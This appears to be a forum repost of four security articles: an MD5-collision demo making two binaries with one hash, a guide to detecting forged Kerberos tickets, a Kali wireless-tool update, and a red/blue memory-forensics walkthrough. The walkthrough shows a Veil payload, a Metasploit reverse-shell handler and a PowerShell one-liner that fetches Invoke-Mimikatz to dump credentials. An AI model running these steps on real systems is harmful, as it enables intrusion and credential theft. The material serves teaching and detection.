Nytro

How to make two binaries with the same MD5 hash One question I was asked when I demo'd creating two PHP files with the same hash is; does it work on compiled binaries? Well the answer is yes in fact that is where I first got the idea from, in this demo. That example uses a C program as both the target and also to do the binary manipulation, which slightly of obscures the way it works. It also makes use of an old very slow implementation on the Wang attack to generate the collisions. To better and more quickly show how it works for an upcoming talk I have created a really simple example using a PHP script to manipulate a binary once compiled. I have put all the code used here on github. Below is the super simple C program it compares two strings and if they don't match it prints out an ASCII art picture of an angel. If they do match you get a picture of a devil. [TABLE=class: lines highlight] [TR] [TD=class: line-numbers] [/TD] [TD=class: line-data] #include <string.h> #include <stdio.h> #define DUMMY "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" int angel(); int devil(); char *dummya = DUMMY "A"; char *dummyb = DUMMY "B"; int main() { if (strcmp(dummya, dummyb) != 0) { return angel(); } else { return devil(); } } int angel() { fprintf(stdout, ". ,\n"); fprintf(stdout, ")). -===- ,((\n"); fprintf(stdout, "))). ,(((\n"); fprintf(stdout, "))))). .:::. ,((((((\n"); fprintf(stdout, "))))))))). :. .: ,(((((((('\n"); fprintf(stdout, "`))))))))))). : - : ,((((((((((((\n"); fprintf(stdout, "))))))))))))))))_:' ':_((((((((((((((('\n"); fprintf(stdout, " `)))))))))))).-' \\___/ '-._(((((((((((\n"); fprintf(stdout, " `))))_._.-' __)( )(_ '-._._(((('\n"); fprintf(stdout, " `))'---)___)))'\\_ _/'((((__(---'(('\n"); fprintf(stdout, " `))))))))))))|' '|(((((((((((('\n"); fprintf(stdout, " `)))))))))/' '\\((((((((('\n"); fprintf(stdout, " `)))))))| |((((((('\n"); fprintf(stdout, " `))))))| |(((((('\n"); fprintf(stdout, " /' '\\\n"); fprintf(stdout, " /' '\\\n"); fprintf(stdout, " /' '\\\n"); fprintf(stdout, " /' '\\\n"); fprintf(stdout, " '---..___..---'\\\n"); return 0; } int devil() { fprintf(stdout, " _.---**""**-.\n"); fprintf(stdout, "._ .-' /|`.\n"); fprintf(stdout, " \\`.' / | `.\n"); fprintf(stdout, " V ( ; \\\n"); fprintf(stdout, " L _.- -. `' \\\n"); fprintf(stdout, " / `-. _.' \\ ;\n"); fprintf(stdout, ": __ ; _ |\n"); fprintf(stdout, ":`-.___.+-*\"': ` ; .' `. |\n"); fprintf(stdout, " |`-/ `--*' / / /`.\\|\n"); fprintf(stdout, ": : \\ :`.| ;\n"); fprintf(stdout, "| | . ;/ .' ' /\n"); fprintf(stdout, ": : / ` :__.'\n"); fprintf(stdout, " \\`._.-' / |\n"); fprintf(stdout, " : ) : ;\n"); fprintf(stdout, " :----.._ | /\n"); fprintf(stdout, " : .-. `. /\n"); fprintf(stdout, " \\ `._ /\n"); fprintf(stdout, " /`- /\n"); fprintf(stdout, " : .'\n"); fprintf(stdout, " \\ ) .-'\n"); fprintf(stdout, " `-----*\"'\n"); return 0; } [/TD] [/TR] [/TABLE] view raw demo.c hosted with ? by GitHub It can be compiled with gcc and executed simply by doing [TABLE] [TR] [TD=class: gutter]1 2 3[/TD] [TD=class: code]longEgg$ gcc -o demo ./demo.c longEgg$ chmod a+x demo longEgg$ ./demo [/TD] [/TR] [/TABLE] Executing the program will print out the angel since the two strings differ in the last letter. Now we have our compiled binary we need to do a bit of mucking about with it. What we are going to do is insert a MD5 collision into the long string of A's of the dummy text. We only need to insert two blocks of 64 bytes but we need to insert it at the beginning of a block i.e. when the byte length is a multiple of 64 bytes. [TABLE=class: lines highlight] [TR] [TD=class: line-numbers] [/TD] [TD=class: line-data] <?php include __DIR__.'/MD5.php'; $inFile = __DIR__.'/demo'; $dummyText = str_pad('', 64, 'A'); function replaceDummyText($input, $replacment, $position) { return substr_replace($input, $replacment, $position, strlen($replacment)); } function findDummyText($filestring, $dummyText) { $pos = 0; $chunks = str_split($filestring, 64); foreach ($chunks as $chunk) { if ($chunk == $dummyText) { break 1; } $pos++; } return $pos*64; } // read in the original binary file in $filestring = file_get_contents($inFile); // find the place where we have the dummy string and its at start of a 64 byte block $pos = findDummyText($filestring, $dummyText); printf('I want to replace %d bytes at position %d in %s'.PHP_EOL, 128, $pos, $inFile); $firstPart = substr($filestring, 0, $pos); //find the IV up to the point we want to insert then print that out $iv = md5_hash($firstPart); printf('Chaining variable up to that point is %s'.PHP_EOL, $iv); if (!file_exists(__DIR__.'/a')) { print('Run fastcoll to generate a 2 block collision in MD5'.PHP_EOL); return; } // replace the dummy text at the correct location $good = replaceDummyText($filestring, file_get_contents(__DIR__.'/a'), $pos); $bad = replaceDummyText($filestring, file_get_contents(__DIR__.'/b'), $pos); // find the secod dummy string $secondDummyTextStart = strpos($good, str_pad('', 191, 'A')); // serach back from where we inserted the collision first time so we can grab the whole // 192 bytes and use it to replace the second string while ('A' == substr($filestring, $pos-1, 1)) { --$pos; } //the 192 butes of str1 $replacement = substr($good, $pos, 192); // replace str1 with 192 bytes cut from of the files // the file it came from will then compare str1 and str2 to 0 $good = replaceDummyText($good, $replacement, $secondDummyTextStart); file_put_contents(__DIR__.'/devil', $good); printf('Just output new file %s with hash %s'.PHP_EOL, __DIR__.'/devil', md5($good)); $bad = replaceDummyText($bad, $replacement, $secondDummyTextStart); file_put_contents(__DIR__.'/angel', $bad); printf('Just output new file %s with hash %s'.PHP_EOL, __DIR__.'/angel', md5($bad)); [/TD] [/TR] [/TABLE] view raw long_egg.php hosted with ? by GitHub When we run the php script over it the first time it finds such a location and calculates the value of the four chaining variables of MD5 at that point in the file. It prints out the hex values concatenated together as a hash. We can now take that value and search for an MD5 collision with that initial state. The best MD5 collision finder is Marc Stevens fastcoll. It can typically find collisions in a couple of seconds using a a variant of the Wang attack. After downloading it you will need to compile it. There should be a Makefile for it in the code on github. Running it specifying the initial state and output files is shown below. [TABLE] [TR] [TD=class: gutter]1 2 3 4 5[/TD] [TD=class: code]longEgg$ wget https://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5-1_source.zip longEgg$ unzip fastcoll_v1.0.0.5-1_source.zip longEgg$ make longEgg$ chmod a+x fastcoll longEgg$./fastcoll -i c15cfe39c40e47f5b8ae31e6658fd1bd -o a b [/TD] [/TR] [/TABLE] The -o option specifies the output files and so will create two new files a and b which contain 2 blocks of binary data. These blocks only work as MD5 collisions within the binary at that point. Running the php script for a second time will create two copies of the original compiled binary with the collisions inserted in the appropriate places. [TABLE] [TR] [TD=class: gutter]1 2 3 4[/TD] [TD=class: code]longEgg$ I want to replace 128 bytes at position 6528 in colliding_binaries/demo longEgg$ Chaining variable up to that point is c15cfe39c40e47f5b8ae31e6658fd1bd longEgg$ Just output new file /Users/nmchugh/longEgg/devil with hash dea9dc288b6c56626997ce86ca8eb6da longEgg$ Just output new file /Users/nmchugh/longEgg/angel with hash dea9dc288b6c56626997ce86ca8eb6da [/TD] [/TR] [/TABLE] So now we have created two more files angel and devil. Running each of those should give different outputs. But they should have the same MD5 value. [TABLE] [TR] [TD=class: gutter]1 2 3 [/TD] [TD=class: code]longEgg$ md5 angel devil MD5 (angel) = dea9dc288b6c56626997ce86ca8eb6da MD5 (devil) = dea9dc288b6c56626997ce86ca8eb6da [/TD] [/TR] [/TABLE] Posted by Nathaniel McHugh at 1:38 PM Sursa: http://natmchugh.blogspot.co.uk/2015/05/how-to-make-two-binaries-with-same-md5.html

Detecting Forged Kerberos Ticket (Golden Ticket & Silver Ticket) Use in Active Directory by Sean Metcalf Over the last 6 months, I have been researching forged Kerberos tickets, specifically Golden Tickets, Silver Tickets, and TGTs generated by MS14-068 exploit code (a type of Golden Ticket). I generated forged Kerberos tickets using Mimikatz and MS14-068 exploits and logged the results. Over the course of several weeks, I identified anomalies in the event logs that are clear indication of forged ticket use in an Active Directory environment. Kerberos Overview & Communication Process: User logs on with username & password. 1a. Password converted to NTLM hash, a timestamp is encrypted with the hash and sent to the KDC as an authenticator in the authentication ticket (TGT) request (AS-REQ). 1b. The Domain Controller (KDC) checks user information (logon restrictions, group membership, etc) & creates Ticket-Granting Ticket (TGT). 2. The TGT is encrypted, signed, & delivered to the user (AS-REP). Only the Kerberos service (KRBTGT) in the domain can open and read TGT data. 3. The User presents the TGT to the DC when requesting a Ticket Granting Service (TGS) ticket (TGS-REQ). The DC opens the TGT & validates PAC checksum – If the DC can open the ticket & the checksum check out, TGT = valid. The data in the TGT is effectively copied to create the TGS ticket. 4. The TGS is encrypted using the target service accounts’ NTLM password hash and sent to the user (TGS-REP). 5.The user connects to the server hosting the service on the appropriate port & presents the TGS (AP-REQ). The service opens the TGS ticket using its NTLM password hash. 6. If mutual authentication is required by the client (think MS15-011: the Group Policy patch from February that added UNC hardening). Unless PAC validation is required (rare), the service accepts all data in the TGS ticket with no communication to the DC. Active Directory Kerberos Key Points: Microsoft uses the NTLM password hash for Kerberos RC4 encryption. Kerberos policy is only checked when the TGT is created & the TGT is the user authenticator to the DC. The DC only checks the user account after the TGT is 20 minutes old to verify the account is valid or enabled. TGS PAC Validation only occurs in specific circumstances. When it does, LSASS on the server sends the PAC Validation request to the DC’s netlogon service (using NRPC) If it runs as a service, PAC validation is optional (disabled). If a service runs as System, it performs server signature verification on the PAC (computer account long-term key). Forging Kerberos Tickets: Forging Kerberos tickets depends on the password hash available to the attacker Golden Ticket requires the KRBTGT password hash. Silver ticket requires the Service Account (either the computer account or user account) password hash. Create anywhere and user anywhere on the network, without elevated rights. Spoof access without modifying AD groups. Once the KRBTGT account password is disclosed, the only way to prevent Golden Tickets is to change the KRBTGT password twice, since the current and previous passwords are kept for this account. Golden Tickets: Golden Tickets are forged Ticket-Granting Tickets (TGTs), also called authentication tickets. As shown in the following graphic, there is no AS-REQ or AS-REP (steps 1 & 2) communication with the Domain Controller. Since a Golden Ticket is a forged TGT, it is sent to the Domain Controller as part of the TGS-REQ to get a service ticket. The Kerberos Golden Ticket is a valid TGT Kerberos ticket since it is encrypted/signed by the domain Kerberos account (KRBTGT). The TGT is only used to prove to the KDC service on the Domain Controller that the user was authenticated by another Domain Controller. The fact that the TGT is encrypted by the KRBTGT password hash and can be decrypted by any KDC service in the domain proves it is valid. Golden Ticket Requirements: * Domain Name [AD PowerShell module: (Get-ADDomain).DNSRoot] * Domain SID [AD PowerShell module: (Get-ADDomain).DomainSID.Value] * Domain KRBTGT Account NTLM password hash * UserID for impersonation. The Domain Controller KDC service doesn’t validate the user account in the TGT until the TGT is older than 20 minutes old, which means the attacker can use a disabled/deleted account or even a fictional account that doesn’t exist in Active Directory. Microsoft’s MS-KILE specification (section 5.1.3 ): “Kerberos V5 does not provide account revocation checking for TGS requests, which allows TGT renewals and service tickets to be issued as long as the TGT is valid even if the account has been revoked. KILE provides a check account policy (section 3.3.5.7.1) that limits the exposure to a shorter time. KILE KDCs in the account domain are required to check accounts when the TGT is older than 20 minutes. This limits the period that a client can get a ticket with a revoked account while limiting the performance cost for AD queries.” Since the domain Kerberos policy is set on the ticket when generated by the KDC service on the Domain Controller, when the ticket is provided, systems trust the ticket validity. This means that even if the domain policy states a Kerberos logon ticket (TGT) is only valid for 10 hours, if the ticket states it is valid for 10 years, it is accepted as such. The KRBTGT account password is never changed* and the attacker can create Golden Tickets until the KRBTGT password is changed (twice). Note that a Golden Ticket created to impersonate a user persists even if the impersonated user changes their password. It bypasses SmartCard authentication requirement since it bypasses the usual checks the DC performs before creating the TGT. This crafted TGT requires an attacker to have the Active Directory domain’s KRBTGT password hash (typically dumped from a Domain Controller). The KRBTGT NTLM hash can be used to generate a valid TGT (using RC4) to impersonate any user with access to any resource in Active Directory. The Golden Ticket (TGT) be generated and used on any machine, even one not domain-joined. Used to get valid TGS tickets from DCs in the AD forest and provides a great method of persisting on a domain with access to EVERYTHING! Mitigation: Limit Domain Admins from logging on to any other computers other than Domain Controllers and a handful of Admin servers (don’t let other admins log on to these servers) Delegate all other rights to custom admin groups. This greatly reduces the ability of an attacker to gain access to a Domain Controller’s Active Directory database. If the attacker can’t access the AD database (ntds.dit file), they can’t get the KRBTGT account NTLM password hash. Silver Tickets: Silver Tickets are forged Ticket Granting Service tickets, also called service tickets. As shown in the following graphic, there is no AS-REQ / AS-REP (steps 1 & 2) and no TGS-REQ / TGS-REP (steps 3 & 4) communication with the Domain Controller. Since a Silver Ticket is a forged TGS, there is no communication with a Domain Controller. Alluded to at BlackHat during the “Golden Ticket” presentation (Duckwall/Delpy) and discussed partly during Tim Medin’s DerbyCon 2014 talk. Skip & Benjamin have provided additional information on Silver Tickets since, but confusion remains. The Kerberos Silver Ticket is a valid Ticket Granting Service (TGS) Kerberos ticket since it is encrypted/signed by the service account configured with a Service Principal Name for each server the Kerberos-authenticating service runs on. While a Golden ticket is a forged TGT valid for gaining access to any Kerberos service, the silver ticket is a forged TGS. This means the Silver Ticket scope is limited to whatever service is targeted on a specific server. While a Golden ticket is encrypted/signed with the domain Kerberos service account (KRBTGT), a Silver Ticket is encrypted/signed by the service account (computer account credential extracted from the computer’s local SAM or service account credential). Most services don’t validate the PAC (by sending the PAC checksum to the Domain Controller for PAC validation), so a valid TGS generated with the service account password hash can include a PAC that is entirely fictitious – even claiming the user is a Domain Admin without challenge or correction. The attacker needs the service account password hash TGS is forged, so no associated TGT, meaning the DC is never contacted. Any event logs are on the targeted server. In my opinion, Silver Tickets can be more dangerous than Golden Tickets – while the scope is more limited than Golden Tickets, the required hash is easier to get and there is no communication with a DC when using them, so detection is more difficult than Golden Tickets Detecting Forged Kerberos Tickets: Most logon & logoff events include the following detail. Normal, valid account logon event data structure: Security ID: DOMAIN\AccountID Account Name: AccountID Account Domain: DOMAIN I discovered that the domain field in many events in the Windows security event log are not properly populated when forged Kerberos tickets are used. The key indicator is that the domain field is blank or contains the FQDN instead of the short (netbios) name. The likely reason for the anomalies is that third party tools that create Kerberos tickets (TGT & TGS) don’t format the tickets exactly the same way as Windows does. The following includes some of the events I have identified that are logged when forged Kerberos tickets are used. Note that Silver Ticket events could be logged on any computer in the AD domain depending on what the target is, workstations, member servers, or Domain Controllers. Golden Tickets and MS14-068 exploit tickets, all of which are TGTs, will have events logged on the Domain Controller. NOTE: As of 4/16/2015: Mimikatz generated tickets may include the string “eo.oe.kiwi” in the domain field. SILVER TICKET DETECTION Silver Ticket events may have one of these issues: The Account Domain field is blank when it should be DOMAIN The Account Domain field is DOMAIN FQDN when it should be DOMAIN. Event ID: 4624 (Account Logon) Account Domain is FQDN & should be short domain name Account Domain: LAB.ADSECURITY.ORG [ADSECLAB] Event ID: 4634 (Account Logoff) Account Domain is blank & should be short domain name Account Domain: _______________ [ADSECLAB] Event ID: 4672 (Admin Logon) Account Domain is blank & should be short domain name Account Domain: _______________ [ADSECLAB] GOLDEN TICKET DETECTION Golden Ticket events may have one of these issues: The Account Domain field is blank when it should be DOMAIN The Account Domain field is DOMAIN FQDN when it should be DOMAIN. Event ID: 4624 (Account Logon) Account Domain is FQDN & should be short domain name Account Domain: LAB.ADSECURITY.ORG [ADSECLAB] Event ID: 4672 (Admin Logon) Account Domain is blank & should be short domain name Account Domain: _______________ [ADSECLAB] MS14-068 Exploit Ticket Detection MS14-068 events may have one of these issues: The Account Domain field is blank when it should be DOMAIN The Account Domain field is DOMAIN FQDN when it should be DOMAIN. Account Name is a different account from the Security ID. PYKEK Events Event ID: 4624 (Account Logon) The Account Domain field is DOMAIN FQDN when it should be DOMAIN. Account Name is a different account from the Security ID Event ID: 4672 (Admin Logon) The Account Domain field is DOMAIN FQDN when it should be DOMAIN. Account Name is a different account from the Security ID Event ID: 4768 (Kerberos TGS Request) The Account Domain field is DOMAIN FQDN when it should be DOMAIN. KEKEO Events Event ID: 4624 (Account Logon) The Account Domain field is DOMAIN FQDN when it should be DOMAIN. Event ID: 4672 (Admin Logon) Account Domain is blank & should be DOMAIN. Event ID: 4768 (Kerberos TGS Request) The Account Domain field is DOMAIN FQDN when it should be DOMAIN. Sursa: http://adsecurity.org/?p=1515

Pixiewps, Reaver & Aircrack-ng Wireless Penetration Testing Tool Updates May 4, 2015 g0tmi1k Penetration Testing A short while ago, we packaged and pushed out a few important wireless penetration testing tool updates for aircrack-ng, pixiewps and reaver into Kali’s repository. These new additions and updates are fairly significant, and may even change your wireless attack workflows. Here’s a short run-down of the updates and the changes they bring. Pixiewps – Bruteforce WPS pins in seconds Pixiewps is a tool used for offline brute forcing of WPS pins, while exploiting the low or non-existing entropy of some wireless access points also known as the pixie dust attack, discovered by Dominique Bongard (slides and video). The pixiewps tool (developed by wiire), was born out of the Kali forums, and the development of the tool can be tracked throughout an interesting forum post. In the correct environment, pixiewps dramatically speeds up the WPS brute force attack time from what was taking up to 12 hours to a . This new attack is mind numbing, and we are somewhat surprised that it hasn’t been discussed on a wider basis. Watch our following video closely, and see how we extract the WPA shared key of this EdiMAX wireless access point in a few seconds using updated versions of pixiewps and reaver, already packaged in Kali: . Aircrack-ng v1.2 RC2 Update Aircrack-ng is the de facto penetration tool suite – essential for any wireless penetration tests or assessments. In this latest Aircrack-ng release, amongst the normal bug fixes and code improvements there has been a significant change to airmon-ng, the tool used to put wireless cards into monitor mode. Other new and notable features are that airtun-ng is now able to decrypt WPA as well as several new airodump-ng flags, such as – -wps and – -uptime. pixiewps reaver aircrack-ng Also notice the new naming convention of the wireless virtual interfaces – wlanXmon, as opposed to monX. Goodbye mon0, hello wlan0mon! For the latest few releases, the aircrack-ng suite had bundled with it aircrack-zc, which uses an improved method of placing wireless cards into monitor mode, as well as more verbose output options. With the release of Aircrack-ng 1.2 RC2, aircrack-zc has officially replaced the original aircrack-ng, as the new standard. More verbose airmon-ng output When things are going right, everything is great! However when this isn’t the case, and you need to troubleshoot wireless issues, you can now use a single command airmon-ng –verbose start wlan0 to gather all the relent information needed. root@kali:~# airmon-ng --verbose start wlan0 No interfering processes found No LSB modules are available. Distributor ID: Kali Description: Kali GNU/Linux 1.1.0 Release: 1.1.0 Codename: moto Linux kali 3.18.0-kali3-amd64 #1 SMP Debian 3.18.6-1~kali2 (2015-03-02) x86_64 GNU/Linux Detected VM using dmi_info This appears to be a VMware Virtual Machine If your system supports VT-d, it may be possible to use PCI devices If your system does not support VT-d, you can only use USB wifi cards K indicates driver is from 3.18.0-kali3-amd64 V indicates driver comes directly from the vendor, almost certainly a bad thing S indicates driver comes from the staging tree, these drivers are meant for reference not actual use, BEWARE ? indicates we do not know where the driver comes from... report this X[PHY]Interface Driver[stack]-FirmwareRev Chipset Extended Info K[phy0]wlan0 rtl8187[mac80211]-N/A Realtek Semiconductor Corp. RTL8187 (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon) (mac80211 station mode vif disabled for [phy0]wlan0) root@kali:~# You can find aircrack-ng’s full change log at the following address: http://www.aircrack-ng.org/doku.php?id=airmon-ng. Updated Reaver WPS attack tool The reaver project was originally developed by Craig Heffner, and the last release was 1.4. As the project seems to have been abandoned, several forks have cropped up – one belonging to a member of the Kali forums, t6_x, who has also integrated the pixiewps attack into a newly minted 1.5.2 release. This new version implements an array of improvements on the original version, and will hopefully be activity maintained by the community. The Kali Community Rocks One of the advantages of being a Kali forum moderator is that you get to witness the community grow and interact. Since the original pixiewps thread started by soxrok2212, it has received over 300 responses, bringing about the implementation of new ideas and updates to the tool. Watching this project emerge from a single forum post all the way to the release of the tool, and seeing the co-operation between the various tool developers while working to get interoperability between their tools was a real privilege. Stay fresh with Kali-Linux You don’t need to do anything special to get this awesome tool chain, just keep your Kali-Linux up-to-date: apt-get update apt-get dist-upgrade Happy penetration testing! Sursa: https://www.kali.org/penetration-testing/pixiewps-reaver-aircrack-ng-updates/

[h=3]toolsmith: Attack & Detection: Hunting in-memory adversaries with Rekall and WinPmem[/h]Prerequisites Any Python-enable system if running from source There is a standalone exe with all dependencies met, available for Windows Introduction This month represents our annual infosec tools edition, and I’ve got a full scenario queued up for you. We’re running with a vignette based in absolute reality. When your organizations are attacked (you already have been) and a compromise occurs (assume it will) it may well follow a script (pun intended) something like this. The most important lesson to be learned here is how to assess attacks of this nature, recognizing that little or none of the following activity will occur on the file system, instead running in memory. When we covered Volatility in September 2011 we invited readers to embrace memory analysis as an absolutely critical capability for incident responders and forensic analysts. This month, in a similar vein, we’ll explore Rekall. The project’s point man, Michael Cohen branched Volatility, aka the scudette branch, in December 2011, as a Technology Preview. In December 2013, it was completely forked and became Rekall to allow inclusion in GRR as well as methods for memory acquisition, and to advance the state of the art in memory analysis. The 2nd of April, 2015, saw the release of Rekall 1.3.1 Dammastock, named for Dammastock Mountain in the Swiss Alps. An update release to 1.3.2 was posted to Github 26 APR 2015. Michael provided personal insight into his process and philosophy, which I’ll share verbatim in part here: “For me memory analysis is such an exciting field. As a field it is wedged between so many other disciplines - such as reverse engineering, operating systems, data structures and algorithms. Rekall as a framework requires expertise in all these fields and more. It is exciting for me to put memory analysis to use in new ways. When we first started experimenting with live analysis I was surprised how reliable and stable this was. No need to take and manage large memory images all the time. The best part was that we could just run remote analysis for triage using a tool like GRR - so now we could run the analysis not on one machine at the time but several thousand at a time! Then, when we added virtual machine introspection support we could run memory analysis on the VM guest from outside without any special support in the hypervisor - and it just worked!” While we won’t cover GRR here, recognize that the ability to conduct live memory analysis across thousands of machines, physical or virtual, without impacting stability on target systems is a massive boon for datacenter and cloud operators. Scenario Overview We start with the assertion that the red team’s attack graph is the blue team’s kill chain. Per Captain Obvious: The better defenders (blue team) understand attacker methods (red team) the more able they are to defend against them. Conversely, red teamers who are aware of blue team detection and analysis tactics, the more readily they can evade them. As we peel back this scenario, we’ll explore both sides of the fight; I’ll walk you through the entire process including attack and detection. I’ll evade and exfiltrate, then detect and define. As you might imagine the attack starts with a targeted phishing attack. We won’t linger here, you’ve all seen the like. The key take away for red and blue, the more enticing the lure, the more numerous the bites. Surveys promising rewards are particularly successful, everyone wants to “win” something, and sadly, many are willing to click and execute payloads to achieve their goal. These folks are the red team’s best friend and the blue team’s bane. Once the payload is delivered and executed for an initial foothold, the focus moves to escalation of privilege if necessary and acquisition of artifacts for pivoting and exploration of key terrain. With the right artifacts (credentials, hashes), causing effect becomes trivial, and often leads to total compromise. For this exercise, we’ll assume we’ve compromised a user who is running their system with administrative privileges, which sadly remains all too common. With some great PowerShell and the omniscient and almighty Mimikatz, the victim’s network can be your playground. I’ll show you how. ATTACK Keep in mind, I’m going into some detail here regarding attack methods so we can then play them back from the defender’s perspective with Rekall, WinPmem, and VolDiff. Veil All good phishing attacks need a great payload, and one of the best ways to ensure you deliver one is Christopher Truncer’s (@ChrisTruncer) Veil-Evasion, part of the Veil-Framework. The most important aspect of Veil use is creating payload that evade antimalware detection. This limits attack awareness for the monitoring and incident response teams as no initial alerts are generated. While the payload does land on the victim’s file system, it’s not likely to end up quarantined or deleted, happily delivering its expected functionality. I installed Veil-Evasion on my Kali VM easily: 1) apt-get install veil 2) cd /usr/share/veil-evasion/setup 3) ./setup.sh Thereafter, to run Veil you need only execute veil-evasion. Veil includes 35 payloads at present, choose list to review them. I chose 17) powershell/meterpreter/rev_https as seen in Figure 1. [TABLE=align: center] [TR] [TD][/TD] [/TR] [TR] [TD]Figure 1 – Veil payload options[/TD] [/TR] [/TABLE] I ran set LHOST 192.168.177.130 for my Kali server acting as the payload handler, followed by info to confirm, and generate to create the payload. I named the payload toolsmith, which Veil saved as toolsmith.bat. If you happened to view the .bat file in a text editor you’d see nothing other than what appears to be a reasonably innocuous PowerShell script with a large Base64 string. Many a responder would potentially roll right past the file as part of normal PowerShell administration. In a real-world penetration test, this would be the payload delivered via spear phishing, ideally to personnel known to have privileged access to key terrain. Metasploit This step assumes our victim has executed our payload in a time period of our choosing. Obviously set up your handlers before sending your phishing mail. I will not discuss persistence here for brevity’s sake but imagine that an attacker will take steps to ensure continued access. Read Fishnet Security’s How-To: Post-ExPersistence Scripting with PowerSploit & Veil as a great primer on these methods. Again, on my Kali system I set up a handler for the shell access created by the Veil payload. 1) cd /opt/metasploit/app/ 2) msfconsole 3) use exploit/multi/handler 4) set payload windows/meterpreter/reverse_https 5) set lhost 192.168.177.130 6) set lport 8443 7) set exitonsession false 8) run exploit –j At this point back returns you to the root msf > prompt. When the victim executes toolsmith.bat, the handler reacts with a Meterpreter session as seen in Figure 2. [TABLE=align: center] [TR] [TD][/TD] [/TR] [TR] [TD]Figure 2 – Victim Meterpreter session[/TD] [/TR] [/TABLE] Use sessions –l to list sessions available, use sessions -i 2 to use the session seen in Figure 2. I know have an interactive shell with the victim system and have some options. As I’m trying to exemplify running almost entirely in victim memory, I opted to not to copy additional scripts to the victim, but if I did so it would be another PowerShell script to make use of Joe Bialek’s (@JosephBialek) Invoke-Mimikatz, which leverages Benjamin Delpy’s (@gentilkiwi) Mimikatz. Instead I pulled down Joe’s script directly from Github and ran it directly in memory, no file system attributes. To do so from the Meterpreter session, I executed the following. 1) shell 2) getsystem (if the user is running as admin you’ll see “got system”) 3) spool /root/meterpreter_output.txt 4) powershell.exe "iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" A brief explanation here. The shell command spawns a command prompt on the victim system, getsystem ensures that you’re running as local system (NT AUTHORITY\SYSTEM) which is important when you’re using Joe’s script to leverage Mimikatz 2.0 along with Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. Again our goal here is to conduct activity such as dumping credentials without ever writing the Mimikatz binary to the victim file system. Our last line does so in an even craftier manner. To prevent the need to write out put to the victim file system I used the spool command to write all content back to a text file on my Kali system. I used PowerShell’s ability to read in Joe’s script directly from Github into memory and poach credentials accordingly. Back on my Kali system a review of /root/meterpreter_output.txt confirms the win. Figure 3 displays the results. [TABLE=align: center] [TR] [TD][/TD] [/TR] [TR] [TD]Figure 3 – Invoke-Mimikatz for the win![/TD] [/TR] [/TABLE] If I had pivoted from this system and moved to a heavily used system such as a terminal server or an Exchange server, I may have acquired domain admin credentials as well. I’d certainly have acquired local admin credentials, and no one ever uses the same local admin credentials across multiple systems, right? ;-) Remember, all this, with the exception of a fairly innocent looking initial payload, toolsmith.bat, took place in memory. How do we spot such behavior and defend against it? Time for Rekall and WinPmem, because they “can remember it for you wholesale!” DEFENSE Rekall preparation Installing Rekall on Windows is as easy as grabbing the installer from Github, 1.3.2 as this is written. On x64 systems it will install to C:\Program Files\Rekall, you can add this to your PATH so you can run Rekall from anywhere. WinPmem WinPmem 1.6.2 is the current stable version and WinPmem 2.0 Alpha is the development release. Both are included on the project Github site. Having an imager embedded with the project is a major benefit, and it’s developed against with a passion. Running WinPmem for live response is as simple as winpmem.exe –l to load the driver so you launch Rekall to mount the winpmem device with rekal -f \\.\pmem (this cannot be changed) for live memory analysis. Rekall use There are a few ways to go about using Rekall. You can take a full memory image, locally with WinPmem, or remotely with GRR, and bring the image back to your analysis workstation. You can also interact with memory on the victim system in real-time live response, which is what differentiates Rekall from Volatility. On the Windows 7 x64 system I compromised with the attack described above I first ran winpmem_1.6.2.exe compromised.raw and shipped the 4GB memory image to my workstation. You can simply run rekal which will drop you into the interactive shell. As an example I ran, rekal –f D:\forensics\memoryImages\toolsmith\compromised.raw, then from the shell ran various plugins. Alternatively I could have run rekal –f D:\forensics\memoryImages\toolsmith\compromised.raw netstat at a standard command prompt for the same results. The interactive shell is the “most powerful and flexible interface” most importantly because it allows session management and storage specific to an image analysis. Suspicious Indicator #1 From the interactive shell I started with the netstat plugin, as I always do. Might as well see who it talking to who, yes? We’re treated to the instant results seen in Figure 4. [TABLE=align: center] [TR] [TD][/TD] [/TR] [TR] [TD]Figure 4 – Rekall netstat plugin shows PowerShell with connections[/TD] [/TR] [/TABLE] Yep, sure enough we see a connection to our above mention attacker at 192.168.177.130, the “owner” is attributed to powershell.exe and the PIDs are 1284 and 2396. Suspicious Indicator #2 With the pstree plugin we can determine the parent PIDs (PPID) for the PowerShell processes. What’s odd here from a defender’s perspective is that each PowerShell process seen in the pstree (Figure 5) is spawned from cmd.exe. While not at all conclusive, it is at least intriguing. [TABLE=align: center] [TR] [TD][/TD] [/TR] [TR] [TD]Figure 5 – Rekall pstree plugin shows powershell.exe PPIDs[/TD] [/TR] [/TABLE] Suspicious Indicator #3 I used malfind to find hidden or injected code/DLLs and dump the results to a directory I was scanning with an AV engine. With malfind pid=1284, dump_dir="/tmp/" I received feedback on PID 1284 (repeated for 2396), with indications specific to Trojan:Win32/Swrort.A. From the MMPC write-up: “Trojan:Win32/Swrort.A is a detection for files that try to connect to a remote server. Once connected, an attacker can perform malicious routines such as downloading other files. They can be installed from a malicious site or used as payloads of exploit files. Once executed, Trojan:Win32/Swrort.A may connect to a remote server using different port numbers.” Hmm, sound familiar from the attack scenario above? ;-) Note that the netstat plugin found that powershell.exe was connecting via 8443 (a “different” port number). Suspicious Indicator #4 To close the loop on this analysis, I used memdump for a few key reasons. This plugin dumps all addressable memory in a process, enumerates the process page tables and writes them out into an external file, creates an index file useful for finding the related virtual address. I did so with memdump pid=2396, dump_dir="/tmp/", ditto for PID 1284. You can use the .dmp output to scan for malware signatures or other patterns. One such method is strings keyword searches. Given that we are responding to what we can reasonably assert is an attack via PowerShell a keyword-based string search is definitely in order. I used my favorite context-driven strings tool and searched for invoke against powershell.exe_2396.dmp. The results paid immediate dividends, I’ve combined to critical matches in Figure 6. [TABLE=align: center] [TR] [TD][/TD] [/TR] [TR] [TD]Figure 6 – Strings results for keyword search from memdump output[/TD] [/TR] [/TABLE] Suspicions confirmed, this box be owned, aargh! The strings results on the left show the initial execution of the 